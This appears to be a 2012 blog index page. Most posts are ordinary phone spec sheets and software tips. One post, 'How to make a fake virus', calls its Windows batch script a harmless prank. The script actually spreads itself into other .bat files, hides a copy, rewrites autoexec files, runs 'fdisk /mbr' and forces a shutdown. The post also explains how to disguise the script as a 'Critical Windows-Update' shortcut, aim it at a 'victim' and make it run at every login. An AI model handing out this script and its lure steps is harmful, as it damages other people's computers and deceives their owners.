Wednesday, 11 April 2012

Nokia PureView 808 - Upcoming

0 comments



Upcoming Mobile Phone


Nokia PureView 808 is the largest camera smartphone in the world. The phone has a whopping 41MP camera with Carl Zeiss lens and Xenon Flash. The phone is expected in the second half of 2012

Mobile Details

Design and Specifcation Nokia PureView 808 is the largest camera smartphone in the world. The phone is a bar shaped touch screen smartphone with a 4.0" capacitive touch-screen. The phone runs on Nokia Symbian Belle operating system and is powered by a 1.3 GHz processor with 512MB RAM.



Camera and Multimedia
Nokia PureView 808 has the largest camera among all smartphones as well as traditional cameras. The phone has a whopping 41MP camera with Carl Zeiss optics Lens and Xenon flash. The camera has auto focus and other additional features such as 1/1.2" sensor size and an Neutral Density filter to help create blur motion effects. The camera also has upto 3 times lossless digital zoom and has geo tagging and face detection.



Connectivity
The phone runs on both quad band 2G and quad band 3G networks. The phone can connect to the internet using GPRS/EDGE or Wifi technology.For other connectivity needs the phone has Bluetooth 3.0, NFC chip and micro USB 2.0.



Memory and Battery
Nokia PureView 808 has 1400mAh standard Li-Ion battery that supports up to 11hours of 2G talk time and 3G talk time of up to 6hrs 30min. The phone comes with 16GB of internal memory which can be further expanded by upto 32GB using micro SD card. 
Continue reading →

Nokia Lumia 800 Price and Specification

0 comments



Best Price: Rs. 21399

  • The Nokia Lumia 800 is the first phone from Nokia running on Windows 7.5 OS
  • It has a 8 mega pixel camera. There is no secondary camera on the phone.
  • It has a 3.7 inches AMOLED touchscreen.
  • The Nokia Lumia 800 has a 1.4GHz processor and 512MB RAM and 16GB internal memory
  • Game play experience is enhanced by its Adreno GPU
  • It supports all connectivity options
  • The Samsung Omnia W is the other Windows 7.5 phone to consider.

Mobile Details

The Nokia Lumia 800 is the first Windows 7.5 based Smartphone from Nokia produced after its much publicized collaboration with Microsoft. The phone has been in the news due to several high profile and extremely innovative advertising campaigns conducted by Nokia.

The Lumia 800 has 3.7inch AMOLED display screen with a 480 x 800 resolution and has the same single slab design as Nokia N9. The Gorilla Glass screen and polycarbonate shell of the Lumia 800, are sure to make it a rough and tough phone.

The phone is powered by a 1.4 GHz Qualcomm Scorpion processor and has 512 MB of RAM. The Adreno 205 GPU will enable you to have a great experience if you plan to use your mobile for gaming.The phone has 16 GB of internal memory.

Nokia has been focusing a lot on the multimedia front and the Lumia 800 is no different. The Lumia 800 ships with a 8 MP camera, 3x Digital Zoom and Carl Zeiss Optics. The camera supports HD Video recording at 720p resolution.

The 1450 mAh Lithium-Ion battery of the phone provides 13 hours of talk time in 2G networks (9 hours on 3G). If you use your phone for entertainment purpose then it can play music upto 55 hours or play video for 7 hours. The Lumia 800 can be charged through both its traditional adapter and USB port.

The Lumia 800 supports most popular connectivity methods like 3G, Wi-Fi, Bluetooth etc in addition to USB connectivity. The handset comes pre-loaded with popular social networking applications like Facebook, Twitter and LinkedIn.
Continue reading →
Wednesday, 21 March 2012

How to make a fake virus

1 comments

Do you want to play a trick on your friends? Our shocking but harmless Virus is the best choice for you! Here's what to do:

Simple Fake-Virus

  • Understand the following: It's just a harmless "virus". It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
  • Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.

@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:\tmp.bat >null attrib +r +s +h c:\tmp.bat echo for %%i in (*.bat) do copy c:\tmp.bat+%%i %%i >>c:\windows\system32\autoexec.NT

echo echo virus detected! >>c:\windows\system32\autoexec.NT
echo pause >>c:\windows\system32\autoexec.NT
echo NT core:infected!


echo echo shame on you! >>c:\autoexec.bat
echo echo system hault-virus identified! >>c:\autoexec.bat
echo chkdsk >>c:\autoexec.bat


echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c "windows has shut down because the lsass service has incountered a write fault at 0x00000000000000000000000000000000000"

This code Details

@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost - nothing much)
shutdown.exe (shutdown)

Preparing the Virus

  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the "virus" into Notepad
  4. Click File -> Save as
  5. Decide for a location to save the fake-virus. You should chose a location where the user won't find the file, so saving it on the desktop would be a bad idea!
  6. Change ".txt" to "All files" in the file type drop-down menu
  7. Chose a harmless filename. Replace the ".txt" at the with ".bat"
  8. Click on save and close Notepad.

Making a fake Icon

Now, that we have our Virus saved, we should prepare a decoy:
  1. Right click on the desktop and go over to "new" then click "short cut".
  2. For the location of the short cut chose our Virus.
  3. Click next
  4. Give the shortcut a name that your victim will click on. ("Music for free", "My Documents", "Critical Windows-Update" "Get Free Cinema-Tickets" or "Internet Explorer")
  5. Click on "Finish"
  6. Right click on the shortcut you have just made and chose "properties". Now click on the "chose icon" button and scroll through the list of icons.
  7. Decide for one of the icons that fits well to the name, chose it by clicking on it and hit OK twice.

Shock your Victim

  • Now it's time to sit back and enjoy the show!

Abort Shutdown-Countdown

Sometimes it might be necessary to stop the countdown before the computer shuts down. Here's how to:
  1. Open the start menu.
  2. Click Run
  3. Type "shutdown.exe -a" and press enter/return.

Warnings

  • Only do this to someone who can handle such a prank!
  • Do not execute such viruses on computers that must be available 24 hours a day. (Like the ones in hospitals)
  • Remember that if you use a shutdown-countdown you should have enough time to abort the countdown! How to do this is mentioned above. That means don't enter "2" and expect yourself to have 2 minutes to disable it!

Tips

  • Alternatively, set your 'virus' to execute every time a user logs in by navigating to Start > All Programs > Startup (Right-click) > Open and copying the shortcut into the folder that opens. Be careful with the shutdown timer's value, too short an interval will make it difficult for even an experienced administrator to deactivate the virus. (At Least 30 Seconds are Necessary!)
  • Running batch files like these in full screen can make them even scarier and more convincing. Right click on the icon and chose properties -> options -> full screen. Do not shutdown computer to early or it may not scare the victim or it wont look like a virus.
Continue reading →
Tuesday, 22 November 2011

Remote Multidrive (Faster Data Access Using Wifi)

0 comments
Remote Multidrive

This is a multifunctional server for sharing files and folders from mobile over local Wi-Fi/WLAN network and over internet.
It provides a faster way to share files than Bluetooth as it works over local network.
The shared content is accessible via web browsers and file managers which supports DAVFS / Webdav.
And there's a built-in file manager with thumbnail view, bookmarks for folders, and wireless file synchronization between PC and android in java supported browsers.

 
Usage
Video: http://youtu.be/30bc62-gEq8First connect the mobile and other devices to the same local network (Wi-Fi, Hotspot, WLAN) and use the shown IP address in browser after start.The IP address is not adjustable from Remote Multi Drive.The IP address is an unique identifier on network and most of cases it is given by a Wi-Fi router when the connection is established.If no WIFI network available you can use hotspot mode, or hotspot applications.Most of the mobile internet (2G , 3G, HSPDA connections) are limited and not allow to access your server, but a mobile internet data card or internet stick SIM is works (it is not simple and tested only with a few SIM). If you can install a SIM card to mobile from USB stick it works, but requires maual APN settings depends on SIM provider.
Tips and Tricks
If the server not accessible on local network probably the mobile using 3G connection instead of WIFI.Usually the local address starts with http://192.168. , and in SSL mode the address starts with https://192.168.Hotspot WIFI mode requires 3G internet connection to work, but it not used on local network by Remote Multi Drive.The java file manager requires to restart the browser after the network connection interrupted.If you connect to the internet via router (WIFI, Hotspot) the server is not accessible from the internet, unless the router settings is allow to access your server port.You can test the configuration on http://www.yougetsignal.com/ tools/open-portsRead more on platform-specific information. 
 
Features
Sharing files from any directory via web based file manager.Automatic gallery generation for pictures, and for other files.Built-in java file manager with thumbnail view, bookmarks for folders, and wireless file synchronization in java supported browsers.Easy to use for files download and upload with all platform, only web browser and network connection required.For example you can share the pictures directory and everybody who knows the server url or IP address can see all pictures.Dynamic DNS (domain name) support.Resume download support (tested only with wget)Network traffic limit setting.Multilingual.Password protection.Basic HTTP authentication support.
Webdav support
Works as remote drive for Symbian devices and works with modern popular file managers like Total Commander with webdav plugin, Krusader, Dolphin, and Nautilus(Ubuntu). Only basic file operations are supported used by file managers.
Continue reading →
Monday, 21 November 2011

Create you own social networking website

0 comments

SocialGO creates a flexible, fun social networking website for you and your group. It is stand-alone or can simply be bolted onto an existing site if need be. As a browser based service, it is operated from dedicated servers and does not require software downloads. In this way, members of a network can access it from anywhere in the world.

Example: visit my social networking site at: http://excuseme.socialgo.com
Continue reading →

How to Use Google Translate

0 comments
You've probably encountered the frustration of finding just the right website in a search only to discover it's not in a language you can understand. Or maybe you want to make your own website available in other languages. Perhaps you just simply just need to know how to say a word or phrase in a different language. Google Translate is a really simple, one-stop way to solve these problems. It has a number of tools you can use to translate web pages and text into many different foreign languages.

Instructions

    • Log in to your Gmail or Google account, or create a new one if necessary. Navigate to the top of the page and click on the "More" link. Choose "Even More" from the drop-down menu and click on Google Translate from the new page that appears.
    • 2
      Use Google Translate to make sense of foreign text or to translate your own text into another language. The default home page for Translate is a text translation box. Enter your text into the box, either by typing it or pasting from a word processing program and choose the correct languages from the drop-down menus below the box. The first drop down is the language your test is already in, while the second is for the language into which you would like to translate.
    • 3
      Translate entire web pages. Simply type in the web address in the bar provided on the Google Translate home page (making sure to include http://) and choose the languages from the drop-down menus.
    • 4
      Search for web pages in something other than your native language. Click on the "Translated Search" tab and enter in in your search terms. Select your native language and the desired search language and hit "Translate and Search."
    • 5
      Use Google Translate as a foreign language dictionary. Click the "Dictionary" tab and type in the word you want translate or learn the meaning of. Then, use the pull down menu to choose your translation terms. Fort example if you wanted to know what the Spanish word "perro" means in English, type in "perro" and choose "Spanish >> English." Google will return the word and related phrases in English.
    • 6
      Add a gadget to your web page allowing other people to translate your page into the language of their choice. Click on the "Tools" tab, select the language in which your web page is written and then choose the language you want available for your readers. You may choose as many gadgets and languages as you like--Google Translate will provide you with the HTML code to add to your page.

Continue reading →

Easiest way to download OVI content on PC/MAC

0 comments

 

 

How To Easily Download .SIS Files From The Ovi Store To Your Computer?

 

 

 

The Ovi Store doesn’t let you download .SIS files directly to your desktop in order to manually install them on the phone. From the desktop website, the maximum you can can do is send yourself a link to the app via a text message. But if you need to download a large game and are without WIFI, you are pretty much out in the cold.

Please refer the step-by-step guide below:

Note* This is not a hack just a tip. Plus only free apps can be downloaded.
  1. Visit Store.Ovi.com and Sign in
  2. Choose your device in order to show the available content for it
  3. Search for apps or games that you want
  4. Edit the URL by adding /download to the end of the content ID number.
  5. Install it

    (Have a look to the above picture which is clearly displaying the content i am downloading from OVI store on my PC)
    Example: http://store.ovi.com/content/214497?clickSource=browse&categoryId=23&contentArea=applications&pos=8 change to http://store.ovi.com/content/214497/download
Continue reading →